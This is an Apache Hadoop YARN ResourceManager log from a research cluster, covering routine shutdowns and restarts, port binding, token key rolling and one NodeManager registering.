2019-09-23 16:43:43,018 ERROR org.apache.hadoop.yarn.server.resourcemanager.ResourceManager: Returning, interrupted : java.lang.InterruptedException
2019-09-23 16:43:43,020 WARN org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Update thread interrupted. Exiting.
2019-09-23 16:43:43,022 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.AllocationFileLoaderService: Interrupted while waiting to reload alloc configuration
2019-09-23 16:43:43,023 INFO org.apache.hadoop.yarn.event.AsyncDispatcher: AsyncDispatcher is draining to stop, igonring any new events.
2019-09-23 16:43:43,023 INFO org.apache.hadoop.yarn.util.AbstractLivelinessMonitor: AMLivelinessMonitor thread interrupted
2019-09-23 16:43:43,023 INFO org.apache.hadoop.yarn.util.AbstractLivelinessMonitor: AMLivelinessMonitor thread interrupted
2019-09-23 16:43:43,023 INFO org.apache.hadoop.yarn.util.AbstractLivelinessMonitor: org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.ContainerAllocationExpirer thread interrupted
2019-09-23 16:43:43,024 ERROR org.apache.hadoop.security.token.delegation.AbstractDelegationTokenSecretManager: ExpiredTokenRemover received java.lang.InterruptedException: sleep interrupted
2019-09-23 16:43:43,025 INFO org.apache.hadoop.metrics2.impl.MetricsSystemImpl: Stopping ResourceManager metrics system...
2019-09-23 16:43:43,026 INFO org.apache.hadoop.metrics2.impl.MetricsSystemImpl: ResourceManager metrics system stopped.
2019-09-23 16:43:43,027 INFO org.apache.hadoop.metrics2.impl.MetricsSystemImpl: ResourceManager metrics system shutdown complete.
2019-09-23 16:43:43,027 INFO org.apache.hadoop.yarn.event.AsyncDispatcher: AsyncDispatcher is draining to stop, igonring any new events.
2019-09-23 16:43:43,027 INFO org.apache.hadoop.yarn.server.resourcemanager.ResourceManager: Transitioned to standby state
2019-09-23 16:43:43,027 INFO org.apache.hadoop.yarn.server.resourcemanager.ResourceManager: SHUTDOWN_MSG: 
/************************************************************
SHUTDOWN_MSG: Shutting down ResourceManager at ctl.hwcluster.ams560-sbu-pg0.utah.cloudlab.us/128.110.153.96
************************************************************/
2019-09-23 16:44:46,927 INFO org.apache.hadoop.yarn.server.resourcemanager.ResourceManager: STARTUP_MSG: 
/************************************************************
STARTUP_MSG: Starting ResourceManager
STARTUP_MSG:   host = ctl.hwcluster.ams560-sbu-pg0.utah.cloudlab.us/128.110.153.96
STARTUP_MSG:   args = []
STARTUP_MSG:   version = 2.7.2
STARTUP_MSG:   build = https://git-wip-us.apache.org/repos/asf/hadoop.git -r b165c4fe8a74265c792ce23f546c64604acf0e41; compiled by 'jenkins' on 2016-01-26T00:08Z
STARTUP_MSG:   java = 1.8.0_222
************************************************************/
2019-09-23 16:44:46,937 INFO org.apache.hadoop.yarn.server.resourcemanager.ResourceManager: registered UNIX signal handlers for [TERM, HUP, INT]
2019-09-23 16:44:47,270 INFO org.apache.hadoop.conf.Configuration: found resource core-site.xml at file:/users/F19_TIP/hadoop/etc/hadoop/core-site.xml
2019-09-23 16:44:47,354 INFO org.apache.hadoop.security.Groups: clearing userToGroupsMap cache
2019-09-23 16:44:47,432 INFO org.apache.hadoop.conf.Configuration: found resource yarn-site.xml at file:/users/F19_TIP/hadoop/etc/hadoop/yarn-site.xml
2019-09-23 16:44:47,607 INFO org.apache.hadoop.yarn.event.AsyncDispatcher: Registering class org.apache.hadoop.yarn.server.resourcemanager.RMFatalEventType for class org.apache.hadoop.yarn.server.resourcemanager.ResourceManager$RMFatalEventDispatcher
2019-09-23 16:44:47,669 INFO org.apache.hadoop.yarn.server.resourcemanager.security.NMTokenSecretManagerInRM: NMTokenKeyRollingInterval: 86400000ms and NMTokenKeyActivationDelay: 900000ms
2019-09-23 16:44:47,673 INFO org.apache.hadoop.yarn.server.resourcemanager.security.RMContainerTokenSecretManager: ContainerTokenKeyRollingInterval: 86400000ms and ContainerTokenKeyActivationDelay: 900000ms
2019-09-23 16:44:47,678 INFO org.apache.hadoop.yarn.server.resourcemanager.security.AMRMTokenSecretManager: AMRMTokenKeyRollingInterval: 86400000ms and AMRMTokenKeyActivationDelay: 900000 ms
2019-09-23 16:44:47,715 INFO org.apache.hadoop.yarn.event.AsyncDispatcher: Registering class org.apache.hadoop.yarn.server.resourcemanager.recovery.RMStateStoreEventType for class org.apache.hadoop.yarn.server.resourcemanager.recovery.RMStateStore$ForwardingEventHandler
2019-09-23 16:44:47,717 INFO org.apache.hadoop.yarn.event.AsyncDispatcher: Registering class org.apache.hadoop.yarn.server.resourcemanager.NodesListManagerEventType for class org.apache.hadoop.yarn.server.resourcemanager.NodesListManager
2019-09-23 16:44:47,717 INFO org.apache.hadoop.yarn.server.resourcemanager.ResourceManager: Using Scheduler: org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler
2019-09-23 16:44:47,750 INFO org.apache.hadoop.yarn.event.AsyncDispatcher: Registering class org.apache.hadoop.yarn.server.resourcemanager.scheduler.event.SchedulerEventType for class org.apache.hadoop.yarn.server.resourcemanager.ResourceManager$SchedulerEventDispatcher
2019-09-23 16:44:47,751 INFO org.apache.hadoop.yarn.event.AsyncDispatcher: Registering class org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppEventType for class org.apache.hadoop.yarn.server.resourcemanager.ResourceManager$ApplicationEventDispatcher
2019-09-23 16:44:47,752 INFO org.apache.hadoop.yarn.event.AsyncDispatcher: Registering class org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptEventType for class org.apache.hadoop.yarn.server.resourcemanager.ResourceManager$ApplicationAttemptEventDispatcher
2019-09-23 16:44:47,753 INFO org.apache.hadoop.yarn.event.AsyncDispatcher: Registering class org.apache.hadoop.yarn.server.resourcemanager.rmnode.RMNodeEventType for class org.apache.hadoop.yarn.server.resourcemanager.ResourceManager$NodeEventDispatcher
2019-09-23 16:44:47,827 INFO org.apache.hadoop.metrics2.impl.MetricsConfig: loaded properties from hadoop-metrics2.properties
2019-09-23 16:44:47,916 INFO org.apache.hadoop.metrics2.impl.MetricsSystemImpl: Scheduled snapshot period at 10 second(s).
2019-09-23 16:44:47,916 INFO org.apache.hadoop.metrics2.impl.MetricsSystemImpl: ResourceManager metrics system started
2019-09-23 16:44:47,951 INFO org.apache.hadoop.yarn.event.AsyncDispatcher: Registering class org.apache.hadoop.yarn.server.resourcemanager.RMAppManagerEventType for class org.apache.hadoop.yarn.server.resourcemanager.RMAppManager
2019-09-23 16:44:47,962 INFO org.apache.hadoop.yarn.event.AsyncDispatcher: Registering class org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncherEventType for class org.apache.hadoop.yarn.server.resourcemanager.amlauncher.ApplicationMasterLauncher
2019-09-23 16:44:47,965 INFO org.apache.hadoop.yarn.server.resourcemanager.RMNMInfo: Registered RMNMInfo MBean
2019-09-23 16:44:47,968 INFO org.apache.hadoop.yarn.security.YarnAuthorizationProvider: org.apache.hadoop.yarn.security.ConfiguredYarnAuthorizer is instiantiated.
2019-09-23 16:44:47,969 INFO org.apache.hadoop.util.HostsFileReader: Refreshing hosts (include/exclude) list
2019-09-23 16:44:48,028 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.AllocationFileLoaderService: Loading allocation file /users/F19_TIP/hadoop/etc/hadoop/fair-scheduler.xml
2019-09-23 16:44:48,057 INFO org.apache.hadoop.yarn.server.resourcemanager.metrics.SystemMetricsPublisher: YARN system metrics publishing service is not enabled
2019-09-23 16:44:48,057 INFO org.apache.hadoop.yarn.server.resourcemanager.ResourceManager: Transitioning to active state
2019-09-23 16:44:48,070 INFO org.apache.hadoop.yarn.server.resourcemanager.recovery.RMStateStore: Updating AMRMToken
2019-09-23 16:44:48,070 INFO org.apache.hadoop.yarn.server.resourcemanager.security.RMContainerTokenSecretManager: Rolling master-key for container-tokens
2019-09-23 16:44:48,070 INFO org.apache.hadoop.yarn.server.resourcemanager.security.NMTokenSecretManagerInRM: Rolling master-key for nm-tokens
2019-09-23 16:44:48,070 INFO org.apache.hadoop.security.token.delegation.AbstractDelegationTokenSecretManager: Updating the current master key for generating delegation tokens
2019-09-23 16:44:48,071 INFO org.apache.hadoop.yarn.server.resourcemanager.security.RMDelegationTokenSecretManager: storing master key with keyID 1
2019-09-23 16:44:48,071 INFO org.apache.hadoop.yarn.server.resourcemanager.recovery.RMStateStore: Storing RMDTMasterKey.
2019-09-23 16:44:48,072 INFO org.apache.hadoop.security.token.delegation.AbstractDelegationTokenSecretManager: Starting expired delegation token remover thread, tokenRemoverScanInterval=60 min(s)
2019-09-23 16:44:48,072 INFO org.apache.hadoop.security.token.delegation.AbstractDelegationTokenSecretManager: Updating the current master key for generating delegation tokens
2019-09-23 16:44:48,072 INFO org.apache.hadoop.yarn.server.resourcemanager.security.RMDelegationTokenSecretManager: storing master key with keyID 2
2019-09-23 16:44:48,073 INFO org.apache.hadoop.yarn.server.resourcemanager.recovery.RMStateStore: Storing RMDTMasterKey.
2019-09-23 16:44:48,074 INFO org.apache.hadoop.yarn.event.AsyncDispatcher: Registering class org.apache.hadoop.yarn.nodelabels.event.NodeLabelsStoreEventType for class org.apache.hadoop.yarn.nodelabels.CommonNodeLabelsManager$ForwardingEventHandler
2019-09-23 16:44:48,101 INFO org.apache.hadoop.ipc.CallQueueManager: Using callQueue class java.util.concurrent.LinkedBlockingQueue
2019-09-23 16:44:48,115 INFO org.apache.hadoop.ipc.Server: Starting Socket Reader #1 for port 8031
2019-09-23 16:44:48,131 INFO org.apache.hadoop.yarn.factories.impl.pb.RpcServerFactoryPBImpl: Adding protocol org.apache.hadoop.yarn.server.api.ResourceTrackerPB to the server
2019-09-23 16:44:48,132 INFO org.apache.hadoop.ipc.Server: IPC Server listener on 8031: starting
2019-09-23 16:44:48,132 INFO org.apache.hadoop.ipc.Server: IPC Server Responder: starting
2019-09-23 16:44:48,167 INFO org.apache.hadoop.ipc.CallQueueManager: Using callQueue class java.util.concurrent.LinkedBlockingQueue
2019-09-23 16:44:48,173 INFO org.apache.hadoop.ipc.Server: Starting Socket Reader #1 for port 8030
2019-09-23 16:44:48,180 INFO org.apache.hadoop.yarn.factories.impl.pb.RpcServerFactoryPBImpl: Adding protocol org.apache.hadoop.yarn.api.ApplicationMasterProtocolPB to the server
2019-09-23 16:44:48,181 INFO org.apache.hadoop.ipc.Server: IPC Server Responder: starting
2019-09-23 16:44:48,181 INFO org.apache.hadoop.ipc.Server: IPC Server listener on 8030: starting
2019-09-23 16:44:48,233 INFO org.apache.hadoop.ipc.CallQueueManager: Using callQueue class java.util.concurrent.LinkedBlockingQueue
2019-09-23 16:44:48,233 INFO org.apache.hadoop.ipc.Server: Starting Socket Reader #1 for port 8032
2019-09-23 16:44:48,237 INFO org.apache.hadoop.yarn.factories.impl.pb.RpcServerFactoryPBImpl: Adding protocol org.apache.hadoop.yarn.api.ApplicationClientProtocolPB to the server
2019-09-23 16:44:48,238 INFO org.apache.hadoop.ipc.Server: IPC Server listener on 8032: starting
2019-09-23 16:44:48,238 INFO org.apache.hadoop.ipc.Server: IPC Server Responder: starting
2019-09-23 16:44:48,249 INFO org.apache.hadoop.yarn.server.resourcemanager.ResourceManager: Transitioned to active state
2019-09-23 16:44:48,347 INFO org.mortbay.log: Logging to org.slf4j.impl.Log4jLoggerAdapter(org.mortbay.log) via org.mortbay.log.Slf4jLog
2019-09-23 16:44:48,353 INFO org.apache.hadoop.security.authentication.server.AuthenticationFilter: Unable to initialize FileSignerSecretProvider, falling back to use random secrets.
2019-09-23 16:44:48,359 INFO org.apache.hadoop.http.HttpRequestLog: Http request log for http.requests.resourcemanager is not defined
2019-09-23 16:44:48,367 INFO org.apache.hadoop.http.HttpServer2: Added global filter 'safety' (class=org.apache.hadoop.http.HttpServer2$QuotingInputFilter)
2019-09-23 16:44:48,371 INFO org.apache.hadoop.http.HttpServer2: Added filter RMAuthenticationFilter (class=org.apache.hadoop.yarn.server.security.http.RMAuthenticationFilter) to context cluster
2019-09-23 16:44:48,371 INFO org.apache.hadoop.http.HttpServer2: Added filter RMAuthenticationFilter (class=org.apache.hadoop.yarn.server.security.http.RMAuthenticationFilter) to context static
2019-09-23 16:44:48,371 INFO org.apache.hadoop.http.HttpServer2: Added filter RMAuthenticationFilter (class=org.apache.hadoop.yarn.server.security.http.RMAuthenticationFilter) to context logs
2019-09-23 16:44:48,372 INFO org.apache.hadoop.http.HttpServer2: Added filter static_user_filter (class=org.apache.hadoop.http.lib.StaticUserWebFilter$StaticUserFilter) to context cluster
2019-09-23 16:44:48,372 INFO org.apache.hadoop.http.HttpServer2: Added filter static_user_filter (class=org.apache.hadoop.http.lib.StaticUserWebFilter$StaticUserFilter) to context static
2019-09-23 16:44:48,372 INFO org.apache.hadoop.http.HttpServer2: Added filter static_user_filter (class=org.apache.hadoop.http.lib.StaticUserWebFilter$StaticUserFilter) to context logs
2019-09-23 16:44:48,376 INFO org.apache.hadoop.http.HttpServer2: adding path spec: /cluster/*
2019-09-23 16:44:48,376 INFO org.apache.hadoop.http.HttpServer2: adding path spec: /ws/*
2019-09-23 16:44:48,711 INFO org.apache.hadoop.yarn.webapp.WebApps: Registered webapp guice modules
2019-09-23 16:44:48,714 INFO org.apache.hadoop.http.HttpServer2: Jetty bound to port 8088
2019-09-23 16:44:48,714 INFO org.mortbay.log: jetty-6.1.26
2019-09-23 16:44:48,790 INFO org.mortbay.log: Extract jar:file:/users/F19_TIP/hadoop/share/hadoop/yarn/hadoop-yarn-common-2.7.2.jar!/webapps/cluster to /tmp/Jetty_ms0833_utah_cloudlab_us_8088_cluster____u3cdjd/webapp
2019-09-23 16:44:49,003 INFO org.apache.hadoop.security.token.delegation.AbstractDelegationTokenSecretManager: Updating the current master key for generating delegation tokens
2019-09-23 16:44:49,004 INFO org.apache.hadoop.security.token.delegation.AbstractDelegationTokenSecretManager: Starting expired delegation token remover thread, tokenRemoverScanInterval=60 min(s)
2019-09-23 16:44:49,004 INFO org.apache.hadoop.security.token.delegation.AbstractDelegationTokenSecretManager: Updating the current master key for generating delegation tokens
2019-09-23 16:44:50,041 INFO org.mortbay.log: Started HttpServer2$SelectChannelConnectorWithSafeStartup@master_hostname:8088
2019-09-23 16:44:50,042 INFO org.apache.hadoop.yarn.webapp.WebApps: Web app cluster started at 8088
2019-09-23 16:44:50,069 INFO org.apache.hadoop.ipc.CallQueueManager: Using callQueue class java.util.concurrent.LinkedBlockingQueue
2019-09-23 16:44:50,070 INFO org.apache.hadoop.ipc.Server: Starting Socket Reader #1 for port 8033
2019-09-23 16:44:50,072 INFO org.apache.hadoop.yarn.factories.impl.pb.RpcServerFactoryPBImpl: Adding protocol org.apache.hadoop.yarn.server.api.ResourceManagerAdministrationProtocolPB to the server
2019-09-23 16:44:50,073 INFO org.apache.hadoop.ipc.Server: IPC Server Responder: starting
2019-09-23 16:44:50,074 INFO org.apache.hadoop.ipc.Server: IPC Server listener on 8033: starting
2019-09-23 16:44:51,060 INFO org.apache.hadoop.yarn.util.RackResolver: Resolved cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us to /default-rack
2019-09-23 16:44:51,063 INFO org.apache.hadoop.yarn.server.resourcemanager.ResourceTrackerService: NodeManager from node cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us(cmPort: 34867 httpPort: 8042) registered with capability: <memory:65536, vCores:32>, assigned nodeId cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:34867
2019-09-23 16:44:51,067 INFO org.apache.hadoop.yarn.server.resourcemanager.rmnode.RMNodeImpl: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:34867 Node Transitioned from NEW to RUNNING
2019-09-23 16:44:51,072 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Added node cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:34867 cluster capacity: <memory:65536, vCores:32>
2019-09-23 16:54:48,045 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.AbstractYarnScheduler: Release request cache is cleaned up
2019-09-23 16:59:02,120 ERROR org.apache.hadoop.yarn.server.resourcemanager.ResourceManager: RECEIVED SIGNAL 15: SIGTERM
2019-09-23 16:59:02,126 ERROR org.apache.hadoop.security.token.delegation.AbstractDelegationTokenSecretManager: ExpiredTokenRemover received java.lang.InterruptedException: sleep interrupted
2019-09-23 16:59:02,128 INFO org.mortbay.log: Stopped HttpServer2$SelectChannelConnectorWithSafeStartup@master_hostname:8088
2019-09-23 16:59:02,231 INFO org.apache.hadoop.ipc.Server: Stopping server on 8032
2019-09-23 16:59:02,233 INFO org.apache.hadoop.ipc.Server: Stopping IPC Server listener on 8032
2019-09-23 16:59:02,233 INFO org.apache.hadoop.ipc.Server: Stopping server on 8033
2019-09-23 16:59:02,233 INFO org.apache.hadoop.ipc.Server: Stopping IPC Server Responder
2019-09-23 16:59:02,234 INFO org.apache.hadoop.ipc.Server: Stopping IPC Server listener on 8033
2019-09-23 16:59:02,235 INFO org.apache.hadoop.yarn.server.resourcemanager.ResourceManager: Transitioning to standby state
2019-09-23 16:59:02,235 INFO org.apache.hadoop.ipc.Server: Stopping IPC Server Responder
2019-09-23 16:59:02,235 WARN org.apache.hadoop.yarn.server.resourcemanager.amlauncher.ApplicationMasterLauncher: org.apache.hadoop.yarn.server.resourcemanager.amlauncher.ApplicationMasterLauncher$LauncherThread interrupted. Returning.
2019-09-23 16:59:02,236 INFO org.apache.hadoop.ipc.Server: Stopping server on 8030
2019-09-23 16:59:02,238 INFO org.apache.hadoop.ipc.Server: Stopping IPC Server listener on 8030
2019-09-23 16:59:02,238 INFO org.apache.hadoop.ipc.Server: Stopping server on 8031
2019-09-23 16:59:02,240 INFO org.apache.hadoop.ipc.Server: Stopping IPC Server listener on 8031
2019-09-23 16:59:02,240 INFO org.apache.hadoop.ipc.Server: Stopping IPC Server Responder
2019-09-23 16:59:02,240 INFO org.apache.hadoop.yarn.util.AbstractLivelinessMonitor: NMLivelinessMonitor thread interrupted
2019-09-23 16:59:02,240 ERROR org.apache.hadoop.yarn.server.resourcemanager.ResourceManager: Returning, interrupted : java.lang.InterruptedException
2019-09-23 16:59:02,242 INFO org.apache.hadoop.ipc.Server: Stopping IPC Server Responder
2019-09-23 16:59:02,242 WARN org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Update thread interrupted. Exiting.
2019-09-23 16:59:02,243 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.AllocationFileLoaderService: Interrupted while waiting to reload alloc configuration
2019-09-23 16:59:02,243 INFO org.apache.hadoop.yarn.event.AsyncDispatcher: AsyncDispatcher is draining to stop, igonring any new events.
2019-09-23 16:59:02,243 INFO org.apache.hadoop.yarn.util.AbstractLivelinessMonitor: AMLivelinessMonitor thread interrupted
2019-09-23 16:59:02,243 ERROR org.apache.hadoop.security.token.delegation.AbstractDelegationTokenSecretManager: ExpiredTokenRemover received java.lang.InterruptedException: sleep interrupted
2019-09-23 16:59:02,243 INFO org.apache.hadoop.yarn.util.AbstractLivelinessMonitor: org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.ContainerAllocationExpirer thread interrupted
2019-09-23 16:59:02,243 INFO org.apache.hadoop.yarn.util.AbstractLivelinessMonitor: AMLivelinessMonitor thread interrupted
2019-09-23 16:59:02,244 INFO org.apache.hadoop.metrics2.impl.MetricsSystemImpl: Stopping ResourceManager metrics system...
2019-09-23 16:59:02,246 INFO org.apache.hadoop.metrics2.impl.MetricsSystemImpl: ResourceManager metrics system stopped.
2019-09-23 16:59:02,247 INFO org.apache.hadoop.metrics2.impl.MetricsSystemImpl: ResourceManager metrics system shutdown complete.
2019-09-23 16:59:02,247 INFO org.apache.hadoop.yarn.event.AsyncDispatcher: AsyncDispatcher is draining to stop, igonring any new events.
2019-09-23 16:59:02,247 INFO org.apache.hadoop.yarn.server.resourcemanager.ResourceManager: Transitioned to standby state
2019-09-23 16:59:02,247 INFO org.apache.hadoop.yarn.server.resourcemanager.ResourceManager: SHUTDOWN_MSG: 
/************************************************************
SHUTDOWN_MSG: Shutting down ResourceManager at ctl.hwcluster.ams560-sbu-pg0.utah.cloudlab.us/128.110.153.96
************************************************************/
2019-09-23 16:59:48,003 INFO org.apache.hadoop.yarn.server.resourcemanager.ResourceManager: STARTUP_MSG: 
/************************************************************
STARTUP_MSG: Starting ResourceManager
STARTUP_MSG:   host = ctl.hwcluster.ams560-sbu-pg0.utah.cloudlab.us/128.110.153.96
STARTUP_MSG:   args = []
STARTUP_MSG:   version = 2.7.2
STARTUP_MSG:   build = https://git-wip-us.apache.org/repos/asf/hadoop.git -r b165c4fe8a74265c792ce23f546c64604acf0e41; compiled by 'jenkins' on 2016-01-26T00:08Z
STARTUP_MSG:   java = 1.8.0_222
************************************************************/
2019-09-23 16:59:48,013 INFO org.apache.hadoop.yarn.server.resourcemanager.ResourceManager: registered UNIX signal handlers for [TERM, HUP, INT]
2019-09-23 16:59:48,319 INFO org.apache.hadoop.conf.Configuration: found resource core-site.xml at file:/users/F19_TIP/hadoop/etc/hadoop/core-site.xml
2019-09-23 16:59:48,399 INFO org.apache.hadoop.security.Groups: clearing userToGroupsMap cache
2019-09-23 16:59:48,482 INFO org.apache.hadoop.conf.Configuration: found resource yarn-site.xml at file:/users/F19_TIP/hadoop/etc/hadoop/yarn-site.xml
2019-09-23 16:59:48,662 INFO org.apache.hadoop.yarn.event.AsyncDispatcher: Registering class org.apache.hadoop.yarn.server.resourcemanager.RMFatalEventType for class org.apache.hadoop.yarn.server.resourcemanager.ResourceManager$RMFatalEventDispatcher
2019-09-23 16:59:48,746 INFO org.apache.hadoop.yarn.server.resourcemanager.security.NMTokenSecretManagerInRM: NMTokenKeyRollingInterval: 86400000ms and NMTokenKeyActivationDelay: 900000ms
2019-09-23 16:59:48,753 INFO org.apache.hadoop.yarn.server.resourcemanager.security.RMContainerTokenSecretManager: ContainerTokenKeyRollingInterval: 86400000ms and ContainerTokenKeyActivationDelay: 900000ms
2019-09-23 16:59:48,759 INFO org.apache.hadoop.yarn.server.resourcemanager.security.AMRMTokenSecretManager: AMRMTokenKeyRollingInterval: 86400000ms and AMRMTokenKeyActivationDelay: 900000 ms
2019-09-23 16:59:48,795 INFO org.apache.hadoop.yarn.event.AsyncDispatcher: Registering class org.apache.hadoop.yarn.server.resourcemanager.recovery.RMStateStoreEventType for class org.apache.hadoop.yarn.server.resourcemanager.recovery.RMStateStore$ForwardingEventHandler
2019-09-23 16:59:48,796 INFO org.apache.hadoop.yarn.event.AsyncDispatcher: Registering class org.apache.hadoop.yarn.server.resourcemanager.NodesListManagerEventType for class org.apache.hadoop.yarn.server.resourcemanager.NodesListManager
2019-09-23 16:59:48,796 INFO org.apache.hadoop.yarn.server.resourcemanager.ResourceManager: Using Scheduler: org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler
2019-09-23 16:59:48,831 INFO org.apache.hadoop.yarn.event.AsyncDispatcher: Registering class org.apache.hadoop.yarn.server.resourcemanager.scheduler.event.SchedulerEventType for class org.apache.hadoop.yarn.server.resourcemanager.ResourceManager$SchedulerEventDispatcher
2019-09-23 16:59:48,832 INFO org.apache.hadoop.yarn.event.AsyncDispatcher: Registering class org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppEventType for class org.apache.hadoop.yarn.server.resourcemanager.ResourceManager$ApplicationEventDispatcher
2019-09-23 16:59:48,833 INFO org.apache.hadoop.yarn.event.AsyncDispatcher: Registering class org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptEventType for class org.apache.hadoop.yarn.server.resourcemanager.ResourceManager$ApplicationAttemptEventDispatcher
2019-09-23 16:59:48,835 INFO org.apache.hadoop.yarn.event.AsyncDispatcher: Registering class org.apache.hadoop.yarn.server.resourcemanager.rmnode.RMNodeEventType for class org.apache.hadoop.yarn.server.resourcemanager.ResourceManager$NodeEventDispatcher
2019-09-23 16:59:48,903 INFO org.apache.hadoop.metrics2.impl.MetricsConfig: loaded properties from hadoop-metrics2.properties
2019-09-23 16:59:48,983 INFO org.apache.hadoop.metrics2.impl.MetricsSystemImpl: Scheduled snapshot period at 10 second(s).
2019-09-23 16:59:48,983 INFO org.apache.hadoop.metrics2.impl.MetricsSystemImpl: ResourceManager metrics system started
2019-09-23 16:59:49,000 INFO org.apache.hadoop.yarn.event.AsyncDispatcher: Registering class org.apache.hadoop.yarn.server.resourcemanager.RMAppManagerEventType for class org.apache.hadoop.yarn.server.resourcemanager.RMAppManager
2019-09-23 16:59:49,013 INFO org.apache.hadoop.yarn.event.AsyncDispatcher: Registering class org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncherEventType for class org.apache.hadoop.yarn.server.resourcemanager.amlauncher.ApplicationMasterLauncher
2019-09-23 16:59:49,018 INFO org.apache.hadoop.yarn.server.resourcemanager.RMNMInfo: Registered RMNMInfo MBean
2019-09-23 16:59:49,022 INFO org.apache.hadoop.yarn.security.YarnAuthorizationProvider: org.apache.hadoop.yarn.security.ConfiguredYarnAuthorizer is instiantiated.
2019-09-23 16:59:49,024 INFO org.apache.hadoop.util.HostsFileReader: Refreshing hosts (include/exclude) list
2019-09-23 16:59:49,098 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.AllocationFileLoaderService: Loading allocation file /users/F19_TIP/hadoop/etc/hadoop/fair-scheduler.xml
2019-09-23 16:59:49,136 INFO org.apache.hadoop.yarn.server.resourcemanager.metrics.SystemMetricsPublisher: YARN system metrics publishing service is not enabled
2019-09-23 16:59:49,136 INFO org.apache.hadoop.yarn.server.resourcemanager.ResourceManager: Transitioning to active state
2019-09-23 16:59:49,149 INFO org.apache.hadoop.yarn.server.resourcemanager.recovery.RMStateStore: Updating AMRMToken
2019-09-23 16:59:49,149 INFO org.apache.hadoop.yarn.server.resourcemanager.security.RMContainerTokenSecretManager: Rolling master-key for container-tokens
2019-09-23 16:59:49,149 INFO org.apache.hadoop.yarn.server.resourcemanager.security.NMTokenSecretManagerInRM: Rolling master-key for nm-tokens
2019-09-23 16:59:49,149 INFO org.apache.hadoop.security.token.delegation.AbstractDelegationTokenSecretManager: Updating the current master key for generating delegation tokens
2019-09-23 16:59:49,150 INFO org.apache.hadoop.yarn.server.resourcemanager.security.RMDelegationTokenSecretManager: storing master key with keyID 1
2019-09-23 16:59:49,150 INFO org.apache.hadoop.yarn.server.resourcemanager.recovery.RMStateStore: Storing RMDTMasterKey.
2019-09-23 16:59:49,151 INFO org.apache.hadoop.security.token.delegation.AbstractDelegationTokenSecretManager: Starting expired delegation token remover thread, tokenRemoverScanInterval=60 min(s)
2019-09-23 16:59:49,151 INFO org.apache.hadoop.security.token.delegation.AbstractDelegationTokenSecretManager: Updating the current master key for generating delegation tokens
2019-09-23 16:59:49,151 INFO org.apache.hadoop.yarn.server.resourcemanager.security.RMDelegationTokenSecretManager: storing master key with keyID 2
2019-09-23 16:59:49,152 INFO org.apache.hadoop.yarn.server.resourcemanager.recovery.RMStateStore: Storing RMDTMasterKey.
2019-09-23 16:59:49,153 INFO org.apache.hadoop.yarn.event.AsyncDispatcher: Registering class org.apache.hadoop.yarn.nodelabels.event.NodeLabelsStoreEventType for class org.apache.hadoop.yarn.nodelabels.CommonNodeLabelsManager$ForwardingEventHandler
2019-09-23 16:59:49,183 INFO org.apache.hadoop.ipc.CallQueueManager: Using callQueue class java.util.concurrent.LinkedBlockingQueue
2019-09-23 16:59:49,197 INFO org.apache.hadoop.ipc.Server: Starting Socket Reader #1 for port 8031
2019-09-23 16:59:49,215 INFO org.apache.hadoop.yarn.factories.impl.pb.RpcServerFactoryPBImpl: Adding protocol org.apache.hadoop.yarn.server.api.ResourceTrackerPB to the server
2019-09-23 16:59:49,215 INFO org.apache.hadoop.ipc.Server: IPC Server Responder: starting
2019-09-23 16:59:49,215 INFO org.apache.hadoop.ipc.Server: IPC Server listener on 8031: starting
2019-09-23 16:59:49,252 INFO org.apache.hadoop.ipc.CallQueueManager: Using callQueue class java.util.concurrent.LinkedBlockingQueue
2019-09-23 16:59:49,258 INFO org.apache.hadoop.ipc.Server: Starting Socket Reader #1 for port 8030
2019-09-23 16:59:49,266 INFO org.apache.hadoop.yarn.factories.impl.pb.RpcServerFactoryPBImpl: Adding protocol org.apache.hadoop.yarn.api.ApplicationMasterProtocolPB to the server
2019-09-23 16:59:49,266 INFO org.apache.hadoop.ipc.Server: IPC Server Responder: starting
2019-09-23 16:59:49,267 INFO org.apache.hadoop.ipc.Server: IPC Server listener on 8030: starting
2019-09-23 16:59:49,315 INFO org.apache.hadoop.ipc.CallQueueManager: Using callQueue class java.util.concurrent.LinkedBlockingQueue
2019-09-23 16:59:49,316 INFO org.apache.hadoop.ipc.Server: Starting Socket Reader #1 for port 8032
2019-09-23 16:59:49,319 INFO org.apache.hadoop.yarn.factories.impl.pb.RpcServerFactoryPBImpl: Adding protocol org.apache.hadoop.yarn.api.ApplicationClientProtocolPB to the server
2019-09-23 16:59:49,319 INFO org.apache.hadoop.ipc.Server: IPC Server listener on 8032: starting
2019-09-23 16:59:49,319 INFO org.apache.hadoop.ipc.Server: IPC Server Responder: starting
2019-09-23 16:59:49,327 INFO org.apache.hadoop.yarn.server.resourcemanager.ResourceManager: Transitioned to active state
2019-09-23 16:59:49,433 INFO org.mortbay.log: Logging to org.slf4j.impl.Log4jLoggerAdapter(org.mortbay.log) via org.mortbay.log.Slf4jLog
2019-09-23 16:59:49,444 INFO org.apache.hadoop.security.authentication.server.AuthenticationFilter: Unable to initialize FileSignerSecretProvider, falling back to use random secrets.
2019-09-23 16:59:49,456 INFO org.apache.hadoop.http.HttpRequestLog: Http request log for http.requests.resourcemanager is not defined
